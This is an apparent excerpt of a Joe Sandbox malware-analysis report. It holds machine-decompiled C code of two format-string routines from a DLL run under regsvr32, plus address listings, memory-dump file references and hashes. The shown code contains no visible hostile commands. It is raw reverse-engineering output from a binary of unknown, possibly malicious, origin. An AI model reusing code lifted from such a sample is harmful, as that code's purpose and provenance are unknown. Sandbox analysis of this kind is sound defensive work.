                                                                      				if (_t195 <= 0) goto 0x80018820;
                                                                      				_t313 =  *((intOrPtr*)(_t280 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t313 + 0x10)) !=  *((intOrPtr*)(_t313 + 8))) goto 0x800187ed;
                                                                      				if ( *((intOrPtr*)(_t313 + 0x18)) == bpl) goto 0x800187e5;
                                                                      				goto 0x800187e8;
                                                                      				 *(_t280 + 0x20) =  *(_t280 + 0x20) + 0x00000001 | 0xffffffff;
                                                                      				goto 0x80018813;
                                                                      				 *(_t280 + 0x20) = _t283 + 1;
                                                                      				 *((intOrPtr*)(_t313 + 0x10)) =  *((intOrPtr*)(_t313 + 0x10)) + _t320;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t280 + 0x460)))))) = r13w;
                                                                      				 *((long long*)( *((intOrPtr*)(_t280 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t280 + 0x460)))) + 2;
                                                                      				if ( *(_t280 + 0x20) == 0xffffffff) goto 0x80018820;
                                                                      				r9d = r9d + r12d;
                                                                      				if (r9d - _t195 < 0) goto 0x800187ca;
                                                                      				_t304 = _t280 + 0x20;
                                                                      				r8d = 0;
                                                                      				_v88 =  *((intOrPtr*)(_t280 + 8));
                                                                      				_t323 = _t280 + 0x460;
                                                                      				_t285 = _t323;
                                                                      				E00000001180013B40(_t283 + 1, _t195, _t280, _t285, _t305, _t307, _t304);
                                                                      				if ((r12b & 0) == 0) goto 0x800188ac;
                                                                      				if ((r12b &  *(_t280 + 0x28) >> 0x00000002) != 0) goto 0x800188ac;
                                                                      				r8d = 0;
                                                                      				if (_t195 <= 0) goto 0x800188ac;
                                                                      				_t299 =  *_t323;
                                                                      				if ( *((intOrPtr*)(_t299 + 0x10)) !=  *((intOrPtr*)(_t299 + 8))) goto 0x80018883;
                                                                      				if ( *((intOrPtr*)(_t299 + 0x18)) == bpl) goto 0x8001887c;
                                                                      				goto 0x8001887f;
                                                                      				 *_t304 =  *_t304 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8001889f;
                                                                      				_t79 = _t285 + 1; // 0x180006272
                                                                      				 *_t304 = _t79;
                                                                      				 *((intOrPtr*)(_t299 + 0x10)) =  *((intOrPtr*)(_t299 + 0x10)) + _t320;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t323)))) = r15w;
                                                                      				 *((long long*)( *_t323)) =  *((long long*)( *_t323)) + 2;
                                                                      				if ( *_t304 == 0xffffffff) goto 0x800188ac;
                                                                      				r8d = r8d + r12d;
                                                                      				if (r8d - _t195 < 0) goto 0x80018865;
                                                                      				if ( *((intOrPtr*)(_t280 + 0x4c)) != bpl) goto 0x8001898e;
                                                                      				if ( *(_t280 + 0x48) <= 0) goto 0x8001898e;
                                                                      				_t322 =  *((intOrPtr*)(_t280 + 8));
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t280 + 8)) + 0x28)) != bpl) goto 0x800188d6;
                                                                      				E00000001180006E80( *_t323, _t280,  *((intOrPtr*)(_t280 + 8)), _t299, _t305);
                                                                      				r9d = 0;
                                                                      				if ( *(_t280 + 0x48) == 0) goto 0x80018953;
                                                                      				_v72 = r9w;
                                                                      				_t161 = E0000000118003E80C( *_t304, 0, _t280,  &_v72,  *((intOrPtr*)(_t280 + 0x40)), _t304, _t305, _t307,  *((intOrPtr*)( *((intOrPtr*)(_t322 + 0x18)) + 8)),  *((intOrPtr*)(_t280 + 8)));
                                                                      				r9d = 0;
                                                                      				if (_t161 <= 0) goto 0x80018988;
                                                                      				_t289 =  *_t323;
                                                                      				if ( *((intOrPtr*)(_t289 + 0x10)) !=  *((intOrPtr*)(_t289 + 8))) goto 0x8001892e;
                                                                      				if ( *((intOrPtr*)(_t289 + 0x18)) == r9b) goto 0x80018928;
                                                                      				 *(_t280 + 0x20) =  *(_t280 + 0x20) + r12d;
                                                                      				goto 0x80018946;
                                                                      				 *(_t280 + 0x20) =  *(_t280 + 0x20) | 0xffffffff;
                                                                      				goto 0x80018946;
                                                                      				 *(_t280 + 0x20) =  *(_t280 + 0x20) + r12d;
                                                                      				 *((intOrPtr*)(_t289 + 0x10)) =  *((intOrPtr*)(_t289 + 0x10)) + _t320;
                                                                      				 *((short*)( *((intOrPtr*)( *_t323)))) = _v72 & 0x0000ffff;
                                                                      				 *((long long*)( *_t323)) =  *((long long*)( *_t323)) + 2;
                                                                      				if (0 + r12d !=  *(_t280 + 0x48)) goto 0x800188e1;
                                                                      				r13d = 0x20;
                                                                      				_t180 =  *_t304;
                                                                      				if (_t180 < 0) goto 0x800189dc;
                                                                      				if ((r12b & 0) == 0) goto 0x800189dc;
                                                                      				r8d = 0;
                                                                      				if (_t195 <= 0) goto 0x800189dc;
                                                                      				_t301 =  *_t323;
                                                                      				if ( *((intOrPtr*)(_t301 + 0x10)) !=  *((intOrPtr*)(_t301 + 8))) goto 0x800189b3;
                                                                      				if ( *((intOrPtr*)(_t301 + 0x18)) == bpl) goto 0x800189ac;
                                                                      				goto 0x800189af;
                                                                      				 *(_t280 + 0x20) =  *(_t280 + 0x20) | 0xffffffff;
                                                                      				goto 0x80018951;
                                                                      				r8d =  *(_t280 + 0x48);
                                                                      				_t291 = _t323;
                                                                      				_v88 =  *((intOrPtr*)(_t280 + 8));
                                                                      				E00000001180013B40( *(_t280 + 0x28) >> 2, _t195, _t280, _t291, _t305, _t307, _t304);
                                                                      				goto 0x80018959;
                                                                      				 *_t304 = _t180 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x800189cf;
                                                                      				 *_t304 = _t291 + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t280 + 0x40)) + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t280 + 0x40)) + 0x10)) + _t320;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t323)))) = r13w;
                                                                      				 *((long long*)( *_t323)) =  *((long long*)( *_t323)) + 2;
                                                                      				if ( *_t304 == 0xffffffff) goto 0x800189dc;
                                                                      				r8d = r8d + r12d;
                                                                      				if (r8d - _t195 < 0) goto 0x80018971;
                                                                      				return E00000001180002FB0(r12b,  *_t304, _v56 ^ _t310);
                                                                      			}






































                                                                      0x180018598
                                                                      0x180018598
                                                                      0x180018598
                                                                      0x180018598
                                                                      0x18001859d
                                                                      0x1800185a2
                                                                      0x1800185b0
                                                                      0x1800185b4
                                                                      0x1800185be
                                                                      0x1800185c3
                                                                      0x1800185cc
                                                                      0x1800185cf
                                                                      0x1800185cf
                                                                      0x1800185d2
                                                                      0x1800185d2
                                                                      0x1800185d6
                                                                      0x1800185da
                                                                      0x1800185dc
                                                                      0x1800185e6
                                                                      0x1800185f0
                                                                      0x1800185f6
                                                                      0x180018600
                                                                      0x18001860a
                                                                      0x18001860f
                                                                      0x180018615
                                                                      0x18001861b
                                                                      0x180018625
                                                                      0x18001862d
                                                                      0x180018632
                                                                      0x180018637
                                                                      0x18001863c
                                                                      0x180018644
                                                                      0x180018649
                                                                      0x180018652
                                                                      0x180018658
                                                                      0x18001865e
                                                                      0x180018664
                                                                      0x18001866a
                                                                      0x180018670
                                                                      0x180018676
                                                                      0x18001867b
                                                                      0x18001867f
                                                                      0x180018681
                                                                      0x180018686
                                                                      0x180018688
                                                                      0x18001868f
                                                                      0x180018696
                                                                      0x180018698
                                                                      0x1800186a3
                                                                      0x1800186a5
                                                                      0x1800186a9
                                                                      0x1800186ae
                                                                      0x1800186b1
                                                                      0x1800186b6
                                                                      0x1800186b8
                                                                      0x1800186bd
                                                                      0x1800186bf
                                                                      0x1800186c5
                                                                      0x1800186ca
                                                                      0x1800186d5
                                                                      0x1800186d9
                                                                      0x1800186e5
                                                                      0x1800186ee
                                                                      0x1800186f8
                                                                      0x1800186fe
                                                                      0x180018703
                                                                      0x18001870a
                                                                      0x18001870f
                                                                      0x18001871d
                                                                      0x180018727
                                                                      0x180018729
                                                                      0x18001872d
                                                                      0x180018732
                                                                      0x180018737
                                                                      0x18001873e
                                                                      0x180018747
                                                                      0x180018749
                                                                      0x18001874f
                                                                      0x180018752
                                                                      0x180018757
                                                                      0x180018768
                                                                      0x18001876c
                                                                      0x180018775
                                                                      0x180018777
                                                                      0x18001877e
                                                                      0x18001878e
                                                                      0x180018792
                                                                      0x180018794
                                                                      0x18001879e
                                                                      0x1800187a5
                                                                      0x1800187aa
                                                                      0x1800187b8
                                                                      0x1800187be
                                                                      0x1800187c0
                                                                      0x1800187c5
                                                                      0x1800187ca
                                                                      0x1800187d9
                                                                      0x1800187df
                                                                      0x1800187e3
                                                                      0x1800187e8
                                                                      0x1800187eb
                                                                      0x1800187f0
                                                                      0x1800187f3
                                                                      0x180018801
                                                                      0x18001880c
                                                                      0x180018816
                                                                      0x180018818
                                                                      0x18001881e
                                                                      0x180018824
                                                                      0x180018828
                                                                      0x18001882b
                                                                      0x180018830
                                                                      0x18001883a
                                                                      0x180018842
                                                                      0x180018852
                                                                      0x18001885a
                                                                      0x18001885c
                                                                      0x180018861
                                                                      0x180018865
                                                                      0x180018870
                                                                      0x180018876
                                                                      0x18001887a
                                                                      0x18001887f
                                                                      0x180018881
                                                                      0x180018883
                                                                      0x180018886
                                                                      0x180018888
                                                                      0x180018892
                                                                      0x180018899
                                                                      0x1800188a2
                                                                      0x1800188a4
                                                                      0x1800188aa
                                                                      0x1800188b0
                                                                      0x1800188bb
                                                                      0x1800188c1
                                                                      0x1800188c9
                                                                      0x1800188ce
                                                                      0x1800188da
                                                                      0x1800188df
                                                                      0x1800188ea
                                                                      0x1800188fb
                                                                      0x180018900
                                                                      0x180018908
                                                                      0x18001890a
                                                                      0x18001891a
                                                                      0x180018920
                                                                      0x180018922
                                                                      0x180018926
                                                                      0x180018928
                                                                      0x18001892c
                                                                      0x18001892e
                                                                      0x180018932
                                                                      0x18001893c
                                                                      0x180018942
                                                                      0x18001894f
                                                                      0x180018953
                                                                      0x180018959
                                                                      0x18001895d
                                                                      0x180018968
                                                                      0x18001896a
                                                                      0x18001896f
                                                                      0x180018971
                                                                      0x18001897c
                                                                      0x180018982
                                                                      0x180018986
                                                                      0x180018988
                                                                      0x18001898c
                                                                      0x180018995
                                                                      0x180018999
                                                                      0x1800189a0
                                                                      0x1800189a5
                                                                      0x1800189aa
                                                                      0x1800189af
                                                                      0x1800189b1
                                                                      0x1800189b6
                                                                      0x1800189b8
                                                                      0x1800189c2
                                                                      0x1800189c9
                                                                      0x1800189d2
                                                                      0x1800189d4
                                                                      0x1800189da
                                                                      0x180018a09

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 04085a12cb233aee2a0ee5f8536adb0583fdae35a71d3469f7dec1aec9ab8857
                                                                      • Instruction ID: e474b74ae1331b50fa17e768b7e1599722b683e1409fcb8afac55e49b5937a00
                                                                      • Opcode Fuzzy Hash: 04085a12cb233aee2a0ee5f8536adb0583fdae35a71d3469f7dec1aec9ab8857
                                                                      • Instruction Fuzzy Hash: FCE1D076604E4986EBEA8F1980403AD37A1FB08BC8F64C216EE49473D4DF35CB5AE745
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 56%
                                                                      			E000000011800143D4(long long __rbx, long long __rcx, long long __rsi, long long __rbp, void* __r8, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				short _v64;
                                                                      				short _v68;
                                                                      				signed short _v72;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				signed int _t124;
                                                                      				void* _t127;
                                                                      				void* _t159;
                                                                      				unsigned int _t166;
                                                                      				signed char _t167;
                                                                      				signed int _t178;
                                                                      				signed short _t190;
                                                                      				void* _t193;
                                                                      				void* _t197;
                                                                      				signed long long _t258;
                                                                      				long long _t276;
                                                                      				long long _t278;
                                                                      				intOrPtr* _t279;
                                                                      				intOrPtr* _t281;
                                                                      				intOrPtr _t285;
                                                                      				intOrPtr* _t287;
                                                                      				void* _t291;
                                                                      				signed long long _t293;
                                                                      				intOrPtr _t296;
                                                                      				intOrPtr _t298;
                                                                      				void* _t300;
                                                                      				signed int* _t301;
                                                                      				long long _t304;
                                                                      				void* _t306;
                                                                      				signed long long _t307;
                                                                      				intOrPtr _t310;
                                                                      				signed long long _t317;
                                                                      				void* _t318;
                                                                      				intOrPtr* _t320;
                                                                      
                                                                      				_t304 = __rbp;
                                                                      				_t302 = __rsi;
                                                                      				_t278 = __rcx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_a32 = __rsi;
                                                                      				_t307 = _t306 - 0x50;
                                                                      				_t258 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v56 = _t258 ^ _t307;
                                                                      				_t124 =  *(__rcx + 0x3a) & 0x0000ffff;
                                                                      				_t276 = __rcx;
                                                                      				_t6 = _t300 - 0x20; // 0x58
                                                                      				_t190 = _t6;
                                                                      				_t7 = _t300 - 0x77; // 0x1
                                                                      				r12d = _t7;
                                                                      				_t197 = _t124 - 0x64;
                                                                      				if (_t197 > 0) goto 0x8001448a;
                                                                      				if (_t197 == 0) goto 0x800144fb;
                                                                      				if (_t124 == 0x41) goto 0x80014508;
                                                                      				if (_t124 == 0x43) goto 0x80014467;
                                                                      				if (_t124 - 0x44 <= 0) goto 0x80014513;
                                                                      				if (_t124 - 0x47 <= 0) goto 0x80014508;
                                                                      				if (_t124 == 0x53) goto 0x800144bd;
                                                                      				if (_t124 == _t190) goto 0x8001447d;
                                                                      				if (_t124 == 0x5a) goto 0x80014473;
                                                                      				if (_t124 == 0x61) goto 0x80014508;
                                                                      				if (_t124 != 0x63) goto 0x80014513;
                                                                      				E00000001180014838(__rcx, __rcx, _t291, __rsi, __r8);
                                                                      				goto 0x8001450d;
                                                                      				E000000011800148FC(__rcx, __rcx, _t302);
                                                                      				goto 0x8001450d;
                                                                      				_t127 = E0000000118001B0C4(r12b, __rcx, __rcx, _t302, __rbp);
                                                                      				goto 0x8001450d;
                                                                      				if (_t127 - 0x67 <= 0) goto 0x80014508;
                                                                      				if (_t127 == 0x69) goto 0x800144fb;
                                                                      				if (_t127 == 0x6e) goto 0x800144f4;
                                                                      				if (_t127 == 0x6f) goto 0x800144d4;
                                                                      				if (_t127 == 0x70) goto 0x800144c4;
                                                                      				if (_t127 == 0x73) goto 0x800144bd;
                                                                      				if (_t127 == 0x75) goto 0x800144ff;
                                                                      				if (_t127 != 0x78) goto 0x80014513;
                                                                      				goto 0x80014480;
                                                                      				E00000001180014978(__rcx, __rcx, _t302);
                                                                      				goto 0x8001450d;
                                                                      				 *((intOrPtr*)(_t278 + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(_t278 + 0x34)) = 0xb;
                                                                      				goto 0x8001447d;
                                                                      				_t166 =  *(_t278 + 0x28);
                                                                      				if ((r12b & _t166 >> 0x00000005) == 0) goto 0x800144e8;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(_t276 + 0x28) = _t166;
                                                                      				_t279 = _t276;
                                                                      				E0000000118001B2B0(0, _t276, _t279, _t302, _t304);
                                                                      				goto 0x8001450d;
                                                                      				E00000001180014D40(_t276, _t279);
                                                                      				goto 0x8001450d;
                                                                      				 *(_t279 + 0x28) =  *(_t279 + 0x28) | 0x00000010;
                                                                      				E0000000118001B49C(0, _t276, _t279, _t302, _t304);
                                                                      				goto 0x8001450d;
                                                                      				if (E00000001180014A88(0, _t276, _t279, _t304) != 0) goto 0x8001451a;
                                                                      				goto 0x80014805;
                                                                      				if ( *((intOrPtr*)(_t276 + 0x38)) != bpl) goto 0x80014802;
                                                                      				_t167 =  *(_t276 + 0x28);
                                                                      				_v68 = 0;
                                                                      				_v64 = 0;
                                                                      				r13d = 0x20;
                                                                      				if ((r12b & 0) == 0) goto 0x80014578;
                                                                      				if ((r12b & 0) == 0) goto 0x8001455a;
                                                                      				_v68 = _t318 + 0xd;
                                                                      				goto 0x80014575;
                                                                      				if ((r12b & _t167) == 0) goto 0x80014566;
                                                                      				goto 0x80014553;
                                                                      				if ((r12b & 0) == 0) goto 0x80014578;
                                                                      				_v68 = r13w;
                                                                      				_t293 = _t317;
                                                                      				r8d =  *(_t276 + 0x3a) & 0x0000ffff;
                                                                      				r10d = 0xffdf;
                                                                      				if ((r10w & (r8w & 0xffffffff) - _t190) != 0) goto 0x8001459d;
                                                                      				r9b = r12b;
                                                                      				if ((r12b & 0) != 0) goto 0x800145a0;
                                                                      				r9b = bpl;
                                                                      				r15d = 0x30;
                                                                      				if (r9b != 0) goto 0x800145ba;
                                                                      				if (0 == 0) goto 0x800145d9;
                                                                      				 *((intOrPtr*)(_t307 + 0x34 + _t293 * 2)) = r15w;
                                                                      				if (r8w == _t190) goto 0x800145cd;
                                                                      				if (r8w != 0x41) goto 0x800145d0;
                                                                      				 *((short*)(_t307 + 0x36 + _t293 * 2)) = _t190 & 0x0000ffff;
                                                                      				_t193 =  *((intOrPtr*)(_t276 + 0x2c)) -  *(_t276 + 0x48);
                                                                      				if ((_t167 & 0x0000000c) != 0) goto 0x80014646;
                                                                      				r9d = 0;
                                                                      				if (_t193 <= 0) goto 0x80014646;
                                                                      				_t310 =  *((intOrPtr*)(_t276 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t310 + 0x10)) !=  *((intOrPtr*)(_t310 + 8))) goto 0x80014613;
                                                                      				if ( *((intOrPtr*)(_t310 + 0x18)) == bpl) goto 0x8001460b;
                                                                      				goto 0x8001460e;
                                                                      				 *(_t276 + 0x20) =  *(_t276 + 0x20) + 0x00000001 | 0xffffffff;
                                                                      				goto 0x80014639;
                                                                      				 *(_t276 + 0x20) = _t279 + 1;
                                                                      				 *((intOrPtr*)(_t310 + 0x10)) =  *((intOrPtr*)(_t310 + 0x10)) + _t317;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t276 + 0x460)))))) = r13w;
                                                                      				 *((long long*)( *((intOrPtr*)(_t276 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t276 + 0x460)))) + 2;
                                                                      				if ( *(_t276 + 0x20) == 0xffffffff) goto 0x80014646;
                                                                      				r9d = r9d + r12d;
                                                                      				if (r9d - _t193 < 0) goto 0x800145f0;
                                                                      				_t301 = _t276 + 0x20;
                                                                      				r8d = 0;
                                                                      				_v88 =  *((intOrPtr*)(_t276 + 8));
                                                                      				_t320 = _t276 + 0x460;
                                                                      				_t281 = _t320;
                                                                      				E00000001180013B40(_t279 + 1, _t193, _t276, _t281, _t302, _t304, _t301);
                                                                      				if ((r12b & 0) == 0) goto 0x800146d2;
                                                                      				if ((r12b &  *(_t276 + 0x28) >> 0x00000002) != 0) goto 0x800146d2;
                                                                      				r8d = 0;
                                                                      				if (_t193 <= 0) goto 0x800146d2;
                                                                      				_t296 =  *_t320;
                                                                      				if ( *((intOrPtr*)(_t296 + 0x10)) !=  *((intOrPtr*)(_t296 + 8))) goto 0x800146a9;
                                                                      				if ( *((intOrPtr*)(_t296 + 0x18)) == bpl) goto 0x800146a2;
                                                                      				goto 0x800146a5;
                                                                      				 *_t301 =  *_t301 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x800146c5;
                                                                      				 *_t301 = _t281 + 1;
                                                                      				 *((intOrPtr*)(_t296 + 0x10)) =  *((intOrPtr*)(_t296 + 0x10)) + _t317;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t320)))) = r15w;
                                                                      				 *((long long*)( *_t320)) =  *((long long*)( *_t320)) + 2;
                                                                      				if ( *_t301 == 0xffffffff) goto 0x800146d2;
                                                                      				r8d = r8d + r12d;
                                                                      				if (r8d - _t193 < 0) goto 0x8001468b;
                                                                      				if ( *((intOrPtr*)(_t276 + 0x4c)) != bpl) goto 0x800147b4;
                                                                      				if ( *(_t276 + 0x48) <= 0) goto 0x800147b4;
                                                                      				_t319 =  *((intOrPtr*)(_t276 + 8));
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t276 + 8)) + 0x28)) != bpl) goto 0x800146fc;
                                                                      				E00000001180006E80( *_t320, _t276,  *((intOrPtr*)(_t276 + 8)), _t296, _t302);
                                                                      				r9d = 0;
                                                                      				if ( *(_t276 + 0x48) == 0) goto 0x80014779;
                                                                      				_v72 = r9w;
                                                                      				_t159 = E0000000118003E80C( *_t301, 0, _t276,  &_v72,  *((intOrPtr*)(_t276 + 0x40)), _t301, _t302, _t304,  *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x18)) + 8)),  *((intOrPtr*)(_t276 + 8)));
                                                                      				r9d = 0;
                                                                      				if (_t159 <= 0) goto 0x800147ae;
                                                                      				_t285 =  *_t320;
                                                                      				if ( *((intOrPtr*)(_t285 + 0x10)) !=  *((intOrPtr*)(_t285 + 8))) goto 0x80014754;
                                                                      				if ( *((intOrPtr*)(_t285 + 0x18)) == r9b) goto 0x8001474e;
                                                                      				 *(_t276 + 0x20) =  *(_t276 + 0x20) + r12d;
                                                                      				goto 0x8001476c;
                                                                      				 *(_t276 + 0x20) =  *(_t276 + 0x20) | 0xffffffff;
                                                                      				goto 0x8001476c;
                                                                      				 *(_t276 + 0x20) =  *(_t276 + 0x20) + r12d;
                                                                      				 *((intOrPtr*)(_t285 + 0x10)) =  *((intOrPtr*)(_t285 + 0x10)) + _t317;
                                                                      				 *((short*)( *((intOrPtr*)( *_t320)))) = _v72 & 0x0000ffff;
                                                                      				 *((long long*)( *_t320)) =  *((long long*)( *_t320)) + 2;
                                                                      				if (0 + r12d !=  *(_t276 + 0x48)) goto 0x80014707;
                                                                      				r13d = 0x20;
                                                                      				_t178 =  *_t301;
                                                                      				if (_t178 < 0) goto 0x80014802;
                                                                      				if ((r12b & 0) == 0) goto 0x80014802;
                                                                      				r8d = 0;
                                                                      				if (_t193 <= 0) goto 0x80014802;
                                                                      				_t298 =  *_t320;
                                                                      				if ( *((intOrPtr*)(_t298 + 0x10)) !=  *((intOrPtr*)(_t298 + 8))) goto 0x800147d9;
                                                                      				if ( *((intOrPtr*)(_t298 + 0x18)) == bpl) goto 0x800147d2;
                                                                      				goto 0x800147d5;
                                                                      				 *(_t276 + 0x20) =  *(_t276 + 0x20) | 0xffffffff;
                                                                      				goto 0x80014777;
                                                                      				r8d =  *(_t276 + 0x48);
                                                                      				_t287 = _t320;
                                                                      				_v88 =  *((intOrPtr*)(_t276 + 8));
                                                                      				E00000001180013B40( *(_t276 + 0x28) >> 2, _t193, _t276, _t287, _t302, _t304, _t301);
                                                                      				goto 0x8001477f;
                                                                      				 *_t301 = _t178 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x800147f5;
                                                                      				 *_t301 = _t287 + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t276 + 0x40)) + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t276 + 0x40)) + 0x10)) + _t317;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t320)))) = r13w;
                                                                      				 *((long long*)( *_t320)) =  *((long long*)( *_t320)) + 2;
                                                                      				if ( *_t301 == 0xffffffff) goto 0x80014802;
                                                                      				r8d = r8d + r12d;
                                                                      				if (r8d - _t193 < 0) goto 0x80014797;
                                                                      				return E00000001180002FB0(r12b,  *_t301, _v56 ^ _t307);
                                                                      			}







































                                                                      0x1800143d4
                                                                      0x1800143d4
                                                                      0x1800143d4
                                                                      0x1800143d4
                                                                      0x1800143d9
                                                                      0x1800143de
                                                                      0x1800143ec
                                                                      0x1800143f0
                                                                      0x1800143fa
                                                                      0x1800143ff
                                                                      0x180014408
                                                                      0x18001440b
                                                                      0x18001440b
                                                                      0x18001440e
                                                                      0x18001440e
                                                                      0x180014412
                                                                      0x180014416
                                                                      0x180014418
                                                                      0x180014422
                                                                      0x18001442c
                                                                      0x180014432
                                                                      0x18001443c
                                                                      0x180014446
                                                                      0x18001444b
                                                                      0x180014451
                                                                      0x180014457
                                                                      0x180014461
                                                                      0x180014469
                                                                      0x18001446e
                                                                      0x180014473
                                                                      0x180014478
                                                                      0x180014480
                                                                      0x180014485
                                                                      0x18001448e
                                                                      0x180014494
                                                                      0x18001449a
                                                                      0x1800144a0
                                                                      0x1800144a6
                                                                      0x1800144ac
                                                                      0x1800144b2
                                                                      0x1800144b7
                                                                      0x1800144bb
                                                                      0x1800144bd
                                                                      0x1800144c2
                                                                      0x1800144c4
                                                                      0x1800144cb
                                                                      0x1800144d2
                                                                      0x1800144d4
                                                                      0x1800144df
                                                                      0x1800144e1
                                                                      0x1800144e5
                                                                      0x1800144ea
                                                                      0x1800144ed
                                                                      0x1800144f2
                                                                      0x1800144f4
                                                                      0x1800144f9
                                                                      0x1800144fb
                                                                      0x180014501
                                                                      0x180014506
                                                                      0x180014511
                                                                      0x180014515
                                                                      0x18001451e
                                                                      0x180014524
                                                                      0x180014529
                                                                      0x180014530
                                                                      0x180014535
                                                                      0x180014543
                                                                      0x18001454d
                                                                      0x180014553
                                                                      0x180014558
                                                                      0x18001455d
                                                                      0x180014564
                                                                      0x18001456d
                                                                      0x18001456f
                                                                      0x180014575
                                                                      0x180014578
                                                                      0x18001457d
                                                                      0x18001458e
                                                                      0x180014592
                                                                      0x18001459b
                                                                      0x18001459d
                                                                      0x1800145a4
                                                                      0x1800145b4
                                                                      0x1800145b8
                                                                      0x1800145ba
                                                                      0x1800145c4
                                                                      0x1800145cb
                                                                      0x1800145d0
                                                                      0x1800145de
                                                                      0x1800145e4
                                                                      0x1800145e6
                                                                      0x1800145eb
                                                                      0x1800145f0
                                                                      0x1800145ff
                                                                      0x180014605
                                                                      0x180014609
                                                                      0x18001460e
                                                                      0x180014611
                                                                      0x180014616
                                                                      0x180014619
                                                                      0x180014627
                                                                      0x180014632
                                                                      0x18001463c
                                                                      0x18001463e
                                                                      0x180014644
                                                                      0x18001464a
                                                                      0x18001464e
                                                                      0x180014651
                                                                      0x180014656
                                                                      0x180014660
                                                                      0x180014668
                                                                      0x180014678
                                                                      0x180014680
                                                                      0x180014682
                                                                      0x180014687
                                                                      0x18001468b
                                                                      0x180014696
                                                                      0x18001469c
                                                                      0x1800146a0
                                                                      0x1800146a5
                                                                      0x1800146a7
                                                                      0x1800146ac
                                                                      0x1800146ae
                                                                      0x1800146b8
                                                                      0x1800146bf
                                                                      0x1800146c8
                                                                      0x1800146ca
                                                                      0x1800146d0
                                                                      0x1800146d6
                                                                      0x1800146e1
                                                                      0x1800146e7
                                                                      0x1800146ef
                                                                      0x1800146f4
                                                                      0x180014700
                                                                      0x180014705
                                                                      0x180014710
                                                                      0x180014721
                                                                      0x180014726
                                                                      0x18001472e
                                                                      0x180014730
                                                                      0x180014740
                                                                      0x180014746
                                                                      0x180014748
                                                                      0x18001474c
                                                                      0x18001474e
                                                                      0x180014752
                                                                      0x180014754
                                                                      0x180014758
                                                                      0x180014762
                                                                      0x180014768
                                                                      0x180014775
                                                                      0x180014779
                                                                      0x18001477f
                                                                      0x180014783
                                                                      0x18001478e
                                                                      0x180014790
                                                                      0x180014795
                                                                      0x180014797
                                                                      0x1800147a2
                                                                      0x1800147a8
                                                                      0x1800147ac
                                                                      0x1800147ae
                                                                      0x1800147b2
                                                                      0x1800147bb
                                                                      0x1800147bf
                                                                      0x1800147c6
                                                                      0x1800147cb
                                                                      0x1800147d0
                                                                      0x1800147d5
                                                                      0x1800147d7
                                                                      0x1800147dc
                                                                      0x1800147de
                                                                      0x1800147e8
                                                                      0x1800147ef
                                                                      0x1800147f8
                                                                      0x1800147fa
                                                                      0x180014800
                                                                      0x18001482f

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 701aee2548d71c2e17488ac65e38fe59db4fa18e90fa17d8832f215bf91c0da3
                                                                      • Instruction ID: 557c7eacee7c4c33e708102530a943ce9809072c48d7ce59d414374adc58e2d6
